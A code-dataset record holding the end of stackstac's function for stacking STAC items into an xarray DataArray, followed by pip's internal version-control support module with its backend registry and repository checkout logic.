with ``dtype`` as well.
fill_value:
Value to fill nodata/masked pixels with. Default: ``np.nan``.
Using NaN is generally the best approach, since many functions already know how to
handle/propagate NaNs, or have NaN-equivalents (``dask.array.nanmean`` vs ``dask.array.mean``,
for example). However, NaN requires a floating-point ``dtype``. If you know the data can
be represented in a smaller data type (like ``uint16``), using a different ``fill_value``
(like 0) and managing it yourself could save a lot of memory.
rescale:
Whether to rescale pixel values by the scale and offset set on the dataset.
Default: True. Note that this could produce floating-point data when the
original values are ints, so set ``dtype`` accordingly. You will NOT be warned
if the cast to ``dtype`` is losing information!
sortby_date:
Whether to pre-sort the items by date (from the ``properties["datetime"]`` field).
One of ``"asc"``, ``"desc"``, or False to disable sorting. Default: ``"asc"``.
Note that if you set ``sortby_date=False``, selecting date ranges from the DataArray
(like ``da.loc["2020-01":"2020-04"]``) may behave strangely, because xarray/pandas
needs indexes to be sorted.
xy_coords:
Whether to add geospatial coordinate labels for the ``x`` and ``y`` dimensions of the DataArray,
allowing for spatial indexing. The coordinates will be in the coordinate reference system given
by ``epsg``
If ``"center"`` (default), the coordinates are for each pixel's centroid, following xarray conventions.
If ``"topleft"``, the coordinates are for each pixel's upper-left corner.
If False, ``x`` and ``y`` will just be indexed by row/column numbers, saving a small amount of time
and local memory.
properties:
Which fields from each STAC Item's ``properties`` to add as coordinates to the DataArray, indexing the "time"
dimension.
If None (default), all properties will be used. If a string or sequence of strings, only those fields
will be used. For each Item missing a particular field, its value for that Item will be None.
If False, no properties will be added.
band_coords:
Whether to include Asset-level metadata as coordinates for the ``bands`` dimension.
If True (default), for each asset ID, the field(s) that have the same value across all Items
will be added as coordinates.
The ``eo:bands`` field is also unpacked if present, and ``sar:polarizations`` is renamed to
``polarization`` for convenience.
gdal_env:
Advanced use: a `~.LayeredEnv` of GDAL configuration options to use while opening
and reading datasets. If None (default), `~.DEFAULT_GDAL_ENV` is used.
See ``rio_reader.py`` for notes on why these default options were chosen.
reader:
Advanced use: the `~.Reader` type to use. Currently there is only one real reader type:
`~.AutoParallelRioReader`. However, there's also `~.FakeReader` (which doesn't read data at all,
just returns random numbers), which can be helpful for isolating whether performace issues are
due to IO and GDAL, or inherent to dask.
Returns
-------
xarray.DataArray:
xarray DataArray, backed by a Dask array. No IO will happen until calling ``.compute()``,
or accessing ``.values``. The dimensions will be ``("time", "band", "y", "x")``.
``time`` will be equal in length to the number of items you pass in, and indexed by STAC Item datetime.
Note that this means multiple entries could have the same index. Note also datetime strings are cast to
'UTC' but passed to xarray without timezone information (dtype='datetime64[ns]').
``band`` will be equal in length to the number of asset IDs used (see the ``assets`` parameter for more).
The size of ``y`` and ``x`` will be determined by ``resolution`` and ``bounds``, which in many cases are
automatically computed from the items you pass in.
"""
plain_items = items_to_plain(items)
if sortby_date is not False:
plain_items = sorted(
plain_items,
key=lambda item: item["properties"].get("datetime", ""),
reverse=sortby_date == "desc",
) # type: ignore
asset_table, spec, asset_ids, plain_items = prepare_items(
plain_items,
assets=assets,
epsg=epsg,
resolution=resolution,
bounds=bounds,
bounds_latlon=bounds_latlon,
snap_bounds=snap_bounds,
)
arr = items_to_dask(
asset_table,
spec,
chunksize=chunksize,
dtype=dtype,
resampling=resampling,
fill_value=fill_value,
rescale=rescale,
reader=reader,
gdal_env=gdal_env,
)
return xr.DataArray(
arr,
*to_coords(
plain_items,
asset_ids,
spec,
xy_coords=xy_coords,
properties=properties,
band_coords=band_coords,
),
attrs=to_attrs(spec),
name="stackstac-" + dask.base.tokenize(arr)
)
| 49.061688
| 117
| 0.666733
|
794b35d6564a5c310e9eae4a86714dff5817b1c4
| 16,319
|
py
|
Python
|
apim-migration-testing-tool/Python/venv/lib/python3.6/site-packages/pip/_internal/vcs/__init__.py
|
tharindu1st/apim-migration-resources
|
dd68aa8c53cf310392bb72e699dd24c57b109cfb
|
[
"Apache-2.0"
] | 69
|
2019-02-18T12:07:35.000Z
|
2022-03-12T10:38:32.000Z
|
venv/lib/python3.7/site-packages/pip/_internal/vcs/__init__.py
|
John1001Song/Big-Data-Robo-Adviser
|
9444dce96954c546333d5aecc92a06c3bfd19aa5
|
[
"MIT"
] | 64
|
2020-04-16T13:35:27.000Z
|
2022-03-31T04:37:41.000Z
|
venv/lib/python3.7/site-packages/pip/_internal/vcs/__init__.py
|
John1001Song/Big-Data-Robo-Adviser
|
9444dce96954c546333d5aecc92a06c3bfd19aa5
|
[
"MIT"
] | 78
|
2020-06-19T09:41:01.000Z
|
2022-02-05T00:13:29.000Z
|
"""Handles all VCS (version control) support"""
from __future__ import absolute_import
import errno
import logging
import os
import shutil
import sys
from pip._vendor.six.moves.urllib import parse as urllib_parse
from pip._internal.exceptions import BadCommand
from pip._internal.utils.misc import (
display_path, backup_dir, call_subprocess, rmtree, ask_path_exists,
)
from pip._internal.utils.typing import MYPY_CHECK_RUNNING
if MYPY_CHECK_RUNNING:
from typing import Dict, Optional, Tuple # noqa: F401
from pip._internal.cli.base_command import Command # noqa: F401
__all__ = ['vcs', 'get_src_requirement']
logger = logging.getLogger(__name__)
class RevOptions(object):
"""
Encapsulates a VCS-specific revision to install, along with any VCS
install options.
Instances of this class should be treated as if immutable.
"""
def __init__(self, vcs, rev=None, extra_args=None):
"""
Args:
vcs: a VersionControl object.
rev: the name of the revision to install.
extra_args: a list of extra options.
"""
if extra_args is None:
extra_args = []
self.extra_args = extra_args
self.rev = rev
self.vcs = vcs
def __repr__(self):
return '<RevOptions {}: rev={!r}>'.format(self.vcs.name, self.rev)
@property
def arg_rev(self):
if self.rev is None:
return self.vcs.default_arg_rev
return self.rev
def to_args(self):
"""
Return the VCS-specific command arguments.
"""
args = []
rev = self.arg_rev
if rev is not None:
args += self.vcs.get_base_rev_args(rev)
args += self.extra_args
return args
def to_display(self):
if not self.rev:
return ''
return ' (to revision {})'.format(self.rev)
def make_new(self, rev):
"""
Make a copy of the current instance, but with a new rev.
Args:
rev: the name of the revision for the new object.
"""
return self.vcs.make_rev_options(rev, extra_args=self.extra_args)
class VcsSupport(object):
_registry = {} # type: Dict[str, Command]
schemes = ['ssh', 'git', 'hg', 'bzr', 'sftp', 'svn']
def __init__(self):
# Register more schemes with urlparse for various version control
# systems
urllib_parse.uses_netloc.extend(self.schemes)
# Python >= 2.7.4, 3.3 doesn't have uses_fragment
if getattr(urllib_parse, 'uses_fragment', None):
urllib_parse.uses_fragment.extend(self.schemes)
super(VcsSupport, self).__init__()
def __iter__(self):
return self._registry.__iter__()
@property
def backends(self):
return list(self._registry.values())
@property
def dirnames(self):
return [backend.dirname for backend in self.backends]
@property
def all_schemes(self):
schemes = []
for backend in self.backends:
schemes.extend(backend.schemes)
return schemes
def register(self, cls):
if not hasattr(cls, 'name'):
logger.warning('Cannot register VCS %s', cls.__name__)
return
if cls.name not in self._registry:
self._registry[cls.name] = cls
logger.debug('Registered VCS backend: %s', cls.name)
def unregister(self, cls=None, name=None):
if name in self._registry:
del self._registry[name]
elif cls in self._registry.values():
del self._registry[cls.name]
else:
logger.warning('Cannot unregister because no class or name given')
def get_backend_name(self, location):
"""
Return the name of the version control backend if found at given
location, e.g. vcs.get_backend_name('/path/to/vcs/checkout')
"""
for vc_type in self._registry.values():
if vc_type.controls_location(location):
logger.debug('Determine that %s uses VCS: %s',
location, vc_type.name)
return vc_type.name
return None
def get_backend(self, name):
name = name.lower()
if name in self._registry:
return self._registry[name]
def get_backend_from_location(self, location):
vc_type = self.get_backend_name(location)
if vc_type:
return self.get_backend(vc_type)
return None
vcs = VcsSupport()
class VersionControl(object):
name = ''
dirname = ''
# List of supported schemes for this Version Control
schemes = () # type: Tuple[str, ...]
# Iterable of environment variable names to pass to call_subprocess().
unset_environ = () # type: Tuple[str, ...]
default_arg_rev = None # type: Optional[str]
def __init__(self, url=None, *args, **kwargs):
self.url = url
super(VersionControl, self).__init__(*args, **kwargs)
def get_base_rev_args(self, rev):
"""
Return the base revision arguments for a vcs command.
Args:
rev: the name of a revision to install. Cannot be None.
"""
raise NotImplementedError
def make_rev_options(self, rev=None, extra_args=None):
"""
Return a RevOptions object.
Args:
rev: the name of a revision to install.
extra_args: a list of extra options.
"""
return RevOptions(self, rev, extra_args=extra_args)
def _is_local_repository(self, repo):
"""
posix absolute paths start with os.path.sep,
win32 ones start with drive (like c:\\folder)
"""
drive, tail = os.path.splitdrive(repo)
return repo.startswith(os.path.sep) or drive
def export(self, location):
"""
Export the repository at the url to the destination location
i.e. only download the files, without vcs informations
"""
raise NotImplementedError
def get_netloc_and_auth(self, netloc, scheme):
"""
Parse the repository URL's netloc, and return the new netloc to use
along with auth information.
Args:
netloc: the original repository URL netloc.
scheme: the repository URL's scheme without the vcs prefix.
This is mainly for the Subversion class to override, so that auth
information can be provided via the --username and --password options
instead of through the URL. For other subclasses like Git without
such an option, auth information must stay in the URL.
Returns: (netloc, (username, password)).
"""
return netloc, (None, None)
def get_url_rev_and_auth(self, url):
"""
Parse the repository URL to use, and return the URL, revision,
and auth info to use.
Returns: (url, rev, (username, password)).
"""
scheme, netloc, path, query, frag = urllib_parse.urlsplit(url)
if '+' not in scheme:
raise ValueError(
"Sorry, {!r} is a malformed VCS url. "
"The format is <vcs>+<protocol>://<url>, "
"e.g. svn+http://myrepo/svn/MyApp#egg=MyApp".format(url)
)
# Remove the vcs prefix.
scheme = scheme.split('+', 1)[1]
netloc, user_pass = self.get_netloc_and_auth(netloc, scheme)
rev = None
if '@' in path:
path, rev = path.rsplit('@', 1)
url = urllib_parse.urlunsplit((scheme, netloc, path, query, ''))
return url, rev, user_pass
def make_rev_args(self, username, password):
"""
Return the RevOptions "extra arguments" to use in obtain().
"""
return []
def get_url_rev_options(self, url):
"""
Return the URL and RevOptions object to use in obtain() and in
some cases export(), as a tuple (url, rev_options).
"""
url, rev, user_pass = self.get_url_rev_and_auth(url)
username, password = user_pass
extra_args = self.make_rev_args(username, password)
rev_options = self.make_rev_options(rev, extra_args=extra_args)
return url, rev_options
def normalize_url(self, url):
"""
Normalize a URL for comparison by unquoting it and removing any
trailing slash.
"""
return urllib_parse.unquote(url).rstrip('/')
def compare_urls(self, url1, url2):
"""
Compare two repo URLs for identity, ignoring incidental differences.
"""
return (self.normalize_url(url1) == self.normalize_url(url2))
def fetch_new(self, dest, url, rev_options):
"""
Fetch a revision from a repository, in the case that this is the
first fetch from the repository.
Args:
dest: the directory to fetch the repository to.
rev_options: a RevOptions object.
"""
raise NotImplementedError
def switch(self, dest, url, rev_options):
"""
Switch the repo at ``dest`` to point to ``URL``.
Args:
rev_options: a RevOptions object.
"""
raise NotImplementedError
def update(self, dest, url, rev_options):
"""
Update an already-existing repo to the given ``rev_options``.
Args:
rev_options: a RevOptions object.
"""
raise NotImplementedError
def is_commit_id_equal(self, dest, name):
"""
Return whether the id of the current commit equals the given name.
Args:
dest: the repository directory.
name: a string name.
"""
raise NotImplementedError
def obtain(self, dest):
"""
Install or update in editable mode the package represented by this
VersionControl object.
Args:
dest: the repository directory in which to install or update.
"""
url, rev_options = self.get_url_rev_options(self.url)
if not os.path.exists(dest):
self.fetch_new(dest, url, rev_options)
return
rev_display = rev_options.to_display()
if self.is_repository_directory(dest):
existing_url = self.get_url(dest)
if self.compare_urls(existing_url, url):
logger.debug(
'%s in %s exists, and has correct URL (%s)',
self.repo_name.title(),
display_path(dest),
url,
)
if not self.is_commit_id_equal(dest, rev_options.rev):
logger.info(
'Updating %s %s%s',
display_path(dest),
self.repo_name,
rev_display,
)
self.update(dest, url, rev_options)
else:
logger.info('Skipping because already up-to-date.')
return
logger.warning(
'%s %s in %s exists with URL %s',
self.name,
self.repo_name,
display_path(dest),
existing_url,
)
prompt = ('(s)witch, (i)gnore, (w)ipe, (b)ackup ',
('s', 'i', 'w', 'b'))
else:
logger.warning(
'Directory %s already exists, and is not a %s %s.',
dest,
self.name,
self.repo_name,
)
prompt = ('(i)gnore, (w)ipe, (b)ackup ', ('i', 'w', 'b'))
logger.warning(
'The plan is to install the %s repository %s',
self.name,
url,
)
response = ask_path_exists('What to do? %s' % prompt[0], prompt[1])
if response == 'a':
sys.exit(-1)
if response == 'w':
logger.warning('Deleting %s', display_path(dest))
rmtree(dest)
self.fetch_new(dest, url, rev_options)
return
if response == 'b':
dest_dir = backup_dir(dest)
logger.warning(
'Backing up %s to %s', display_path(dest), dest_dir,
)
shutil.move(dest, dest_dir)
self.fetch_new(dest, url, rev_options)
return
# Do nothing if the response is "i".
if response == 's':
logger.info(
'Switching %s %s to %s%s',
self.repo_name,
display_path(dest),
url,
rev_display,
)
self.switch(dest, url, rev_options)
def unpack(self, location):
"""
Clean up current location and download the url repository
(and vcs infos) into location
"""
if os.path.exists(location):
rmtree(location)
self.obtain(location)
def get_src_requirement(self, dist, location):
"""
Return a string representing the requirement needed to
redownload the files currently present in location, something
like:
{repository_url}@{revision}#egg={project_name}-{version_identifier}
"""
raise NotImplementedError
def get_url(self, location):
"""
Return the url used at location
"""
raise NotImplementedError
def get_revision(self, location):
"""
Return the current commit id of the files at the given location.
"""
raise NotImplementedError
def run_command(self, cmd, show_stdout=True, cwd=None,
on_returncode='raise',
command_desc=None,
extra_environ=None, spinner=None):
"""
Run a VCS subcommand
This is simply a wrapper around call_subprocess that adds the VCS
command name, and checks that the VCS is available
"""
cmd = [self.name] + cmd
try:
return call_subprocess(cmd, show_stdout, cwd,
on_returncode,
command_desc, extra_environ,
unset_environ=self.unset_environ,
spinner=spinner)
except OSError as e:
# errno.ENOENT = no such file or directory
# In other words, the VCS executable isn't available
if e.errno == errno.ENOENT:
raise BadCommand(
'Cannot find command %r - do you have '
'%r installed and in your '
'PATH?' % (self.name, self.name))
else:
raise # re-raise exception if a different error occurred
@classmethod
def is_repository_directory(cls, path):
"""
Return whether a directory path is a repository directory.
"""
logger.debug('Checking in %s for %s (%s)...',
path, cls.dirname, cls.name)
return os.path.exists(os.path.join(path, cls.dirname))
@classmethod
def controls_location(cls, location):
"""
Check if a location is controlled by the vcs.
It is meant to be overridden to implement smarter detection
mechanisms for specific vcs.
This can do more than is_repository_directory() alone. For example,
the Git override checks that Git is actually available.
"""
return cls.is_repository_directory(location)
def get_src_requirement(dist, location):
version_control = vcs.get_backend_from_location(location)
if version_control:
try:
return version_control().get_src_requirement(dist,
location)
except BadCommand:
logger.warning(
'cannot determine version of editable source in %s '
'(%s command not found in path)',
location,
version_control.name,
)
return dist.as_requirement()
logger.warning(
'cannot determine version of editable source in %s (is not SVN '
'checkout, Git clone, Mercurial clone or Bazaar branch)',
location,
)
return dist.as_requirement()
| 31.998039
| 78
| 0.57001
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.